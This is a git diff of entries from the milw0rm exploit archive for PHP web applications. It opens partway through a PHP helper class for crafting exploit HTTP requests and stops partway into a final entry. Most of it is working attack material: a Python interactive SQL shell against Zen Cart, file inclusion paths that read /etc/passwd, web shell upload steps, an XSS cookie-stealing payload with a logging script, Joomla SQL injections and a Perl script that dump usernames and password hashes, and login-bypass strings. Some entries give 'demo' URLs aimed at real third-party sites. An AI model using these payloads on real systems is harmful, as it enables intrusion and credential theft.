+ * + * @access public + * @param array array FormDataArray + * @return string $this->sock() + * @example $formdata = array( + * frmdt_url => 'http://localhost/upload.php', + * frmdt_boundary => '123456', # Optional + * 'var' => 'example', + * 'file' => array( + * frmdt_type => 'image/gif', # Optional + * frmdt_transfert => 'binary' # Optional + * frmdt_filename => 'hello.php, + * frmdt_content => '<?php echo 1; ?>')); + * $this->formdata($formdata); + * + */ + function formdata($array) + { + $this->target($array[frmdt_url]); + $this->method = 'formdata'; + $this->data = ''; + + if(!isset($array[frmdt_boundary])) + $this->boundary = 'phpsploit'; + else + $this->boundary = $array[frmdt_boundary]; + + foreach($array as $key => $value) + { + if(!preg_match('#^frmdt_(boundary|url)#',$key)) + { + $this->data .= str_repeat('-',29).$this->boundary."\r\n"; + $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; + + if(!is_array($value)) + { + $this->data .= "\r\n\r\n".$value."\r\n"; + } + else + { + $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; + + if(isset($array[$key][frmdt_type])) + $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; + + if(isset($array[$key][frmdt_transfert])) + $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; + + $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; + } + } + } + + $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; + return $this->sock(); + } + + + /** + * This function returns the content + * of the server response, without + * the headers. 
+ * + * @access public + * @param string code ServerResponse + * @return string $this->server_content + * @example $this->getcontent() + * @example $this->getcontent($this->get('http://localhost/')) + * + */ + function getcontent($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_content = ''; + + for($i=1;$i<count($code);$i++) + $this->server_content .= $code[$i]; + + return $this->server_content; + } + + + /** + * This function returns the headers + * of the server response, without + * the content. + * + * @access public + * @param string code ServerResponse + * @return string $this->server_header + * @example $this->getcontent() + * @example $this->getcontent($this->post('http://localhost/','1=2')) + * + */ + function getheader($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_header = $code[0]; + + return $this->server_header; + } + + + /** + * This function is called by the + * cookiejar() function. It adds the + * value of the "Set-Cookie" header + * in the "Cookie" header for the + * next request. You don't have to + * call it. + * + * @access private + * @param string code ServerResponse + * + */ + function getcookie() + { + foreach(explode("\r\n",$this->getheader()) as $header) + { + if(preg_match('/set-cookie/i',$header)) + { + $fequal = strpos($header,'='); + $fvirgu = strpos($header,';'); + + // 12=strlen('set-cookie: ') + $cname = substr($header,12,$fequal-12); + $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); + + $this->cookie[trim($cname)] = trim($cvalu); + } + } + } + + + /** + * This function is called by the + * get()/post() functions. You + * don't have to call it. 
+ * + * @access private + * @param string urltarg Url + * @example $this->target('http://localhost/') + * + */ + function target($urltarg) + { + if(!ereg('^http://',$urltarg)) + $urltarg = 'http://'.$urltarg; + + $urlarr = parse_url($urltarg); + $this->url = 'http://'.$urlarr['host'].$urlarr['path']; + + if(isset($urlarr['query'])) + $this->url .= '?'.$urlarr['query']; + + $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; + $this->host = $urlarr['host']; + + if($this->port != '80') + $this->host .= ':'.$this->port; + + if(!isset($urlarr['path']) or empty($urlarr['path'])) + die("Error: No path precised"); + + $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); + + if($this->port > 65535) + die("Error: Invalid port number"); + } + + + /** + * If you call this function, + * the script will extract all + * 'Set-Cookie' headers values + * and it will automatically add + * them into the 'Cookie' header + * for all next requests. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->cookiejar(0) + * @example $this->cookiejar(1) + * + */ + function cookiejar($code) + { + if($code=='0') + $this->cookiejar=FALSE; + + elseif($code=='1') + $this->cookiejar=TRUE; + } + + + /** + * If you call this function, + * the script will follow all + * redirections sent by the server. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->allowredirection(0) + * @example $this->allowredirection(1) + * + */ + function allowredirection($code) + { + if($code=='0') + $this->allowredirection=FALSE; + + elseif($code=='1') + $this->allowredirection=TRUE; + } + + + /** + * This function is called if + * allowredirection() is enabled. + * You don't have to call it. 
+ * + * @access private + * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) + * @return string $this->get($this->last_redirection) + * @return string $this->recv; + * + */ + function getredirection() + { + if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) + { + $this->last_redirection = trim($codearr[2]); + + if(!ereg('://',$this->last_redirection)) + return $this->get('http://'.$this->host.$this->path.$this->last_redirection); + + else + return $this->get($this->last_redirection); + } + else + return $this->recv; + } + + + /** + * This function allows you + * to reset some parameters. + * + * @access public + * @param string func Param + * @example $this->reset('header') + * @example $this->reset('cookie') + * @example $this->reset() + * + */ + function reset($func='') + { + switch($func) + { + case 'header': + $this->header = array(''); + break; + + case 'cookie': + $this->cookie = array(''); + break; + + default: + $this->cookiejar = ''; + $this->header = array(''); + $this->cookie = array(''); + $this->allowredirection = ''; + break; + } + } +} + +?> + +# milw0rm.com [2009-06-23] diff --git a/platforms/php/webapps/9005.py b/platforms/php/webapps/9005.py index f8f06e22b..ed74f6ab4 100755 --- a/platforms/php/webapps/9005.py +++ b/platforms/php/webapps/9005.py 
@@ -1,58 +1,58 @@ -#!/usr/bin/python - -# -# ------- Zen Cart 1.3.8 Remote SQL Execution -# http://www.zen-cart.com/ -# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! -# A new version (1.3.8a) is avaible on http://www.zen-cart.com/ -# -# BlackH :) -# - -# -# Notes: must have admin/sqlpatch.php enabled -# -# clean the database : -# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1); -# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php'; - -import urllib, urllib2, re, sys - -a,b = sys.argv,0 - -def option(name, need = 0): - global a, b - for param in sys.argv: - if(param == '-'+name): return str(sys.argv[b+1]) - b = b + 1 - if(need): - print '\n#error', "-"+name, 'parameter required' - exit(1) - -if (len(sys.argv) < 2): - print """ -=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________= -======================================================================== -| BlackH <Bl4ck.H@gmail.com> | -======================================================================== -| | -| $system> python """+sys.argv[0]+""" -url <url> | -| Param: <url> ex: http://victim.com/site (no slash) | -| | -| Note: blind "injection" | -======================================================================== - """ - exit(1) - -url, trick = option('url', 1), "/password_forgotten.php" - -while True: - cmd = raw_input('sql@jah$ ') - if (cmd == "exit"): exit(1) - req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd})) - if (re.findall('1 statements processed',urllib2.urlopen(req).read())): - print '>> success (', cmd, ")" - else: - print '>> failed, be sure to end with ; (', cmd, ")" - -# milw0rm.com [2009-06-23] +#!/usr/bin/python + +# +# ------- Zen Cart 1.3.8 Remote SQL Execution +# http://www.zen-cart.com/ +# Zen Cart Ecommerce - putting the dream of 
server rooting within reach of anyone! +# A new version (1.3.8a) is avaible on http://www.zen-cart.com/ +# +# BlackH :) +# + +# +# Notes: must have admin/sqlpatch.php enabled +# +# clean the database : +# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1); +# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php'; + +import urllib, urllib2, re, sys + +a,b = sys.argv,0 + +def option(name, need = 0): + global a, b + for param in sys.argv: + if(param == '-'+name): return str(sys.argv[b+1]) + b = b + 1 + if(need): + print '\n#error', "-"+name, 'parameter required' + exit(1) + +if (len(sys.argv) < 2): + print """ +=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________= +======================================================================== +| BlackH <Bl4ck.H@gmail.com> | +======================================================================== +| | +| $system> python """+sys.argv[0]+""" -url <url> | +| Param: <url> ex: http://victim.com/site (no slash) | +| | +| Note: blind "injection" | +======================================================================== + """ + exit(1) + +url, trick = option('url', 1), "/password_forgotten.php" + +while True: + cmd = raw_input('sql@jah$ ') + if (cmd == "exit"): exit(1) + req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd})) + if (re.findall('1 statements processed',urllib2.urlopen(req).read())): + print '>> success (', cmd, ")" + else: + print '>> failed, be sure to end with ; (', cmd, ")" + +# milw0rm.com [2009-06-23] diff --git a/platforms/php/webapps/9009.txt b/platforms/php/webapps/9009.txt index 05b88f3d2..0ff0751f0 100755 --- a/platforms/php/webapps/9009.txt +++ b/platforms/php/webapps/9009.txt 
@@ -1,17 +1,17 @@ -Authentication Bypass in BASE version 1.2.4 and prior - Insecure -Cookie Handling Vulnerability - --------------------------------------------- - -Author.: Tim Medin - -Contact: nidem.nidem [at] gmail [d0t] com - -------------------------------------------------------------------------------------------------- - -Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; -path=/"; - -Note: After creating cookie go to http://[website]/base_main.php - -# milw0rm.com [2009-06-24] +Authentication Bypass in BASE version 1.2.4 and prior - Insecure +Cookie Handling Vulnerability + +-------------------------------------------- + +Author.: Tim Medin + +Contact: nidem.nidem [at] gmail [d0t] com + +------------------------------------------------------------------------------------------------- + +Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; +path=/"; + +Note: After creating cookie go to http://[website]/base_main.php + +# milw0rm.com [2009-06-24] diff --git a/platforms/php/webapps/9010.txt b/platforms/php/webapps/9010.txt index 711aaf65b..2dd97e080 100755 --- a/platforms/php/webapps/9010.txt +++ b/platforms/php/webapps/9010.txt 
@@ -1,20 +1,20 @@ -|-->Glossword 1.8.11 LFI -|-->CMS INFORMATION: -| -|-->WEB: http://code.google.com/p/glossword/ -|-->DOWNLOAD: http://code.google.com/p/glossword/downloads/list -|-->DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia. -| -| CMS VULNERABILITY: -| -|-->TESTED ON: firefox 3 -|-->DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ... -|-->CATEGORY: LOCAL FILE INCLUSION (LFI) -|-->AFFECT VERSION: all > 1.8.11 -|-->Author: t0fx -|-->GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais - -|-->Exploit : -| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00 - -# milw0rm.com [2009-06-24] +|-->Glossword 1.8.11 LFI +|-->CMS INFORMATION: +| +|-->WEB: http://code.google.com/p/glossword/ +|-->DOWNLOAD: http://code.google.com/p/glossword/downloads/list +|-->DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia. +| +| CMS VULNERABILITY: +| +|-->TESTED ON: firefox 3 +|-->DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ... +|-->CATEGORY: LOCAL FILE INCLUSION (LFI) +|-->AFFECT VERSION: all > 1.8.11 +|-->Author: t0fx +|-->GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais + +|-->Exploit : +| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00 + +# milw0rm.com [2009-06-24] diff --git a/platforms/php/webapps/9011.txt b/platforms/php/webapps/9011.txt index e8d5fa14b..f304e09bf 100755 --- a/platforms/php/webapps/9011.txt +++ b/platforms/php/webapps/9011.txt 
@@ -1,39 +1,39 @@ -############################################################## -| -| Joomla Component [com_pinboard] Remote File Upload Vulnerability -| -| Author : ViRuSMaN -| -| Contact : v-.m@live.com -| -| Home : Islam-Attack.CoM , HackTeach.OrG -| -############################################################## -| -| Dork inurl:com_pinboard -| -| Exploite : -| -| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload -| -| or -| -| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm -| -| [#] click on the photo in Top Of Left -| -| [#] upload your shell shell.php.jpg & Confirmer SVP -| -| [#] Pwd Your Shell -| -| target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg -| -| Or -| -| target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg -| -############################################################## -|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's -############################################################## - -# milw0rm.com [2009-06-24] +############################################################## +| +| Joomla Component [com_pinboard] Remote File Upload Vulnerability +| +| Author : ViRuSMaN +| +| Contact : v-.m@live.com +| +| Home : Islam-Attack.CoM , HackTeach.OrG +| +############################################################## +| +| Dork inurl:com_pinboard +| +| Exploite : +| +| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload +| +| or +| +| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm +| +| [#] click on the photo in Top Of Left +| +| [#] upload your shell shell.php.jpg & Confirmer SVP +| +| [#] Pwd Your Shell +| +| target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg +| +| Or +| +| target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg +| 
+############################################################## +|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's +############################################################## + +# milw0rm.com [2009-06-24] diff --git a/platforms/php/webapps/9014.txt b/platforms/php/webapps/9014.txt index 4ee845ab3..894402407 100755 --- a/platforms/php/webapps/9014.txt +++ b/platforms/php/webapps/9014.txt 
@@ -1,50 +1,50 @@ -PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability -bug found by Jose Luis Gongora Fernandez (a.k.a) JosS - -contact: sys-project[at]hotmail.com -website: http://www.hack0wn.com/ - -- download: http://sourceforge.net/project/showfiles.php?group_id=186100 - -~ [XSS] - - The forum allowed insert javascript code and html code. - - PoC: - "><h1>0wned</h1> - "><script>alert("JosS b0x");</script> - - ----------- - - Cookie Stealing: - <script>window.location=Â’http://127.0.0.1/stealing.php?cookie=Â’+document.cookie</script> - - stealing.php - <?php - $archivo = fopen('log.htm','a'); - $cookie = $_GET['c']; - $usuario = $_GET['id']; - $ip = getenv ('REMOTE_ADDR'); - $re = $HTTPREFERRER; - - $fecha=date("j F, Y, g:i a"); - fwrite($archivo, '<hr>USER and PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> - - IP: ' .$ip. '<br> Date and Time: ' .$fecha. '</hr>'); - fclose($archivo); - ?> - -~ [BLIND] - - PoC: - /index.php?module=forum&show=thread&id=1 and 1=2 [False] - /index.php?module=forum&show=thread&id=1 and 1=1 [True] - - /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5 - /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4 - - - -__h0__ - -# milw0rm.com [2009-06-24] +PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability +bug found by Jose Luis Gongora Fernandez (a.k.a) JosS + +contact: sys-project[at]hotmail.com +website: http://www.hack0wn.com/ + +- download: http://sourceforge.net/project/showfiles.php?group_id=186100 + +~ [XSS] + + The forum allowed insert javascript code and html code. 
+ + PoC: + "><h1>0wned</h1> + "><script>alert("JosS b0x");</script> + + ----------- + + Cookie Stealing: + <script>window.location=Â’http://127.0.0.1/stealing.php?cookie=Â’+document.cookie</script> + + stealing.php + <?php + $archivo = fopen('log.htm','a'); + $cookie = $_GET['c']; + $usuario = $_GET['id']; + $ip = getenv ('REMOTE_ADDR'); + $re = $HTTPREFERRER; + + $fecha=date("j F, Y, g:i a"); + fwrite($archivo, '<hr>USER and PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> + + IP: ' .$ip. '<br> Date and Time: ' .$fecha. '</hr>'); + fclose($archivo); + ?> + +~ [BLIND] + + PoC: + /index.php?module=forum&show=thread&id=1 and 1=2 [False] + /index.php?module=forum&show=thread&id=1 and 1=1 [True] + + /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5 + /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4 + + + +__h0__ + +# milw0rm.com [2009-06-24] diff --git a/platforms/php/webapps/9015.txt b/platforms/php/webapps/9015.txt index 2c15cf8ba..874766e09 100755 --- a/platforms/php/webapps/9015.txt +++ b/platforms/php/webapps/9015.txt 
@@ -1,19 +1,19 @@ -LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability -bug found by Jose Luis Gongora Fernandez (a.k.a) JosS - -contact: sys-project[at]hotmail.com -website: http://www.hack0wn.com/ - -- download: http://sourceforge.net/project/showfiles.php?group_id=251474 - -[smarty.php] - define("SMARTY_DIR", $cwd."/smarty/"); - require_once(SMARTY_DIR."/Smarty.class.php"); - -PoC: - [php.ini] register_globals= On - http://localhost/locms/smarty.php?cwd=../../../../../../../../../../../../boot.ini%00 - -Greetz: YEnH4ckEr, str0ke and spanish hackers! - -# milw0rm.com [2009-06-24] +LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability +bug found by Jose Luis Gongora Fernandez (a.k.a) JosS + +contact: sys-project[at]hotmail.com +website: http://www.hack0wn.com/ + +- download: http://sourceforge.net/project/showfiles.php?group_id=251474 + +[smarty.php] + define("SMARTY_DIR", $cwd."/smarty/"); + require_once(SMARTY_DIR."/Smarty.class.php"); + +PoC: + [php.ini] register_globals= On + http://localhost/locms/smarty.php?cwd=../../../../../../../../../../../../boot.ini%00 + +Greetz: YEnH4ckEr, str0ke and spanish hackers! + +# milw0rm.com [2009-06-24] diff --git a/platforms/php/webapps/9016.txt b/platforms/php/webapps/9016.txt index d2c4f4001..c409d4d2f 100755 --- a/platforms/php/webapps/9016.txt +++ b/platforms/php/webapps/9016.txt 
@@ -1,41 +1,41 @@ -++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -Joomla Component com_amocourse (catid) SQL-injection Vulnerability -++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - - -################################################### -[+] Author : Chip D3 Bi0s -[+] Email : chipdebios[alt+64]gmail.com -[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt -[+] Vulnerability : SQL injection - -################################################### - - - -Example: -http://localHost/path//index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code] - -n = catid valid - -[SQL code] -+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- - - -Demo Live (1) -http://www.kaieden.com/joomla/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- - - -Demo Live Mambo (2) -http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- - - - - - - -+++++++++++++++++++++++++++++++++++++++ -#[!] 
Produced in South America -+++++++++++++++++++++++++++++++++++++++ - -# milw0rm.com [2009-06-24] +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +Joomla Component com_amocourse (catid) SQL-injection Vulnerability +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + +################################################### +[+] Author : Chip D3 Bi0s +[+] Email : chipdebios[alt+64]gmail.com +[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt +[+] Vulnerability : SQL injection + +################################################### + + + +Example: +http://localHost/path//index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code] + +n = catid valid + +[SQL code] ++union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- + + +Demo Live (1) +http://www.kaieden.com/joomla/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- + + +Demo Live Mambo (2) +http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- + + + + + + ++++++++++++++++++++++++++++++++++++++++ +#[!] Produced in South America ++++++++++++++++++++++++++++++++++++++++ + +# milw0rm.com [2009-06-24] diff --git a/platforms/php/webapps/9017.txt b/platforms/php/webapps/9017.txt index ce8390e7f..d6750f206 100755 --- a/platforms/php/webapps/9017.txt +++ b/platforms/php/webapps/9017.txt 
@@ -1,37 +1,37 @@ -#!/usr/bin/perl -w -# Joomla Component (com_pinboard) Remote SQL Injection -######################################## -#[*] By : Stack -#POc -#http://site/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users-- -#http://site/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users-- -#Demo -#http://munimartin.at/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users-- -#http://munimartin.at/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users-- -######################################## -system("color 02"); -print "\t\t############################################################\n\n"; -print "\t\t# Joomla Component (com_pinboard) Remote SQL Injection #\n\n"; -print "\t\t# by Stack #\n\n"; -print "\t\t############################################################\n\n"; -use LWP::UserAgent; -die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; -system("color f"); -$user="username"; -$pass="password"; -$tab="jos_users"; -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); - -$host = $ARGV[0] . 
"/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48+union+select+1,2,3,4,5,6,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),8,9,10+from+".$tab."--"; -$res = $b->request(HTTP::Request->new(GET=>$host)); -$answer = $res->content; -if ($answer =~ /<user>(.*?)<user>/){ - print "\nBrought to you by v4-team.com...\n"; - print "\n[+] Admin User : $1"; -} -if ($answer =~/<pass>(.*?)<pass>/){print "\n[+] Admin Hash : $1\n\n"; -print "\t\t# Exploit has ben aported user and password hash #\n\n";} -else{print "\n[-] Exploit Failed...\n";} - -# milw0rm.com [2009-06-25] +#!/usr/bin/perl -w +# Joomla Component (com_pinboard) Remote SQL Injection +######################################## +#[*] By : Stack +#POc +#http://site/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users-- +#http://site/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users-- +#Demo +#http://munimartin.at/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users-- +#http://munimartin.at/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users-- +######################################## +system("color 02"); +print "\t\t############################################################\n\n"; +print "\t\t# Joomla Component (com_pinboard) Remote SQL Injection #\n\n"; +print "\t\t# by Stack #\n\n"; +print "\t\t############################################################\n\n"; +use LWP::UserAgent; +die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; +system("color f"); +$user="username"; +$pass="password"; +$tab="jos_users"; +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 
(compatible; MSIE 7.0; Windows NT 5.1)'); + +$host = $ARGV[0] . "/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48+union+select+1,2,3,4,5,6,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),8,9,10+from+".$tab."--"; +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; +if ($answer =~ /<user>(.*?)<user>/){ + print "\nBrought to you by v4-team.com...\n"; + print "\n[+] Admin User : $1"; +} +if ($answer =~/<pass>(.*?)<pass>/){print "\n[+] Admin Hash : $1\n\n"; +print "\t\t# Exploit has ben aported user and password hash #\n\n";} +else{print "\n[-] Exploit Failed...\n";} + +# milw0rm.com [2009-06-25] diff --git a/platforms/php/webapps/9019.txt b/platforms/php/webapps/9019.txt index d13ed6736..93b7c2021 100755 --- a/platforms/php/webapps/9019.txt +++ b/platforms/php/webapps/9019.txt 
@@ -1,154 +1,154 @@ -*********************************************************************************************** -*********************************************************************************************** -** ** -** ** -** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** -** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** -** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** -** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ -**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- -** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ - [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** -** ** -** ** -** VIVA SPAIN!...GANAREMOS EL MUNDIAL!...o.O ** -** PROUD TO BE SPANISH! ** -** ** -*********************************************************************************************** -*********************************************************************************************** - ----------------------------------------------------------------------------------------------- -| SQL INJECTION VULNERABILITY | -|--------------------------------------------------------------------------------------------| -| | AlumniServer v-1.0.1 | | -| CMS INFORMATION: ------------------------------ | -| | -|-->WEB: http://www.alumniserver.net/ | -|-->DOWNLOAD: http://www.alumniserver.net/ | -|-->DEMO: N/A | -|-->CATEGORY: CMS/Education | -|-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools | -| and companies. Services for usersinclude profile page,... 
| -|-->RELEASED: 2009-06-11 | -| | -| CMS VULNERABILITY: | -| | -|-->TESTED ON: firefox 3 | -|-->DORK: "AlumniServer project" | -|-->CATEGORY: AUTH-BYPASS (SQLi) | -|-->AFFECT VERSION: CURRENT | -|-->Discovered Bug date: 2009-06-16 | -|-->Reported Bug date: 2009-06-16 | -|-->Fixed bug date: N/A | -|-->Info patch (????): N/A | -|-->Author: YEnH4ckEr | -|-->mail: y3nh4ck3r[at]gmail[dot]com | -|-->WEB/BLOG: N/A | -|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | -|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | ----------------------------------------------------------------------------------------------- - - - -##################### -//////////////////// - -AUTH-BYPASS (SQLi): - -//////////////////// -##################### - - - -<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> - - - ------------ -VULN FILE: ------------ - - - -Path --> [HOME_PATH]/login.php -Lines --> 26, 32, 72 - - -//Note: requestVar is a function against LFI and XSS mainly, -//avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars. - - -... - -26: $email=requestVar('login','',true); - -... - -32: $pwd=requestVar('password','',true); - -... - -72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line - -... - - ------------ -EXPLOITS: ------------ - - - -[!!!] Case-1: If only one user (rarely)... - - -~~~> E-Mail=y3nh4ck3r@gmail.com') OR 1=1 /* -~~~> Password=nothing - - -[!!!] Case-2: If more users... - - -[++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php): - - -~~~> E-Mail=[real_admin_mail]')/* -~~~> Password=nothing - - -[++] Note: Search for first or second name. -[++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a registered user - is easy to get necessary information. 
- - -~~~> E-Mail=y3nh4ck3r@gmail.com') OR gn='AdminGn' /* -~~~> Password=nothing - - -[!!!] Case-3: If admin is a hidden user... - - -~~~> E-Mail=y3nh4ck3r@gmail.com') OR hideuser='y' /* -~~~> Password=nothing - - - - -<<<-----------------------------EOF---------------------------------->>>ENJOY IT! - - - - -############################################################################## -############################################################################## -##**************************************************************************## -## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## -##**************************************************************************## -##--------------------------------------------------------------------------## -##**************************************************************************## -## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## -##**************************************************************************## -############################################################################## -############################################################################## - -# milw0rm.com [2009-06-25] +*********************************************************************************************** +*********************************************************************************************** +** ** +** ** +** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** +** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** +** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** +** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ +**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- +** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ + [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** +** ** +** ** +** VIVA SPAIN!...GANAREMOS EL MUNDIAL!...o.O 
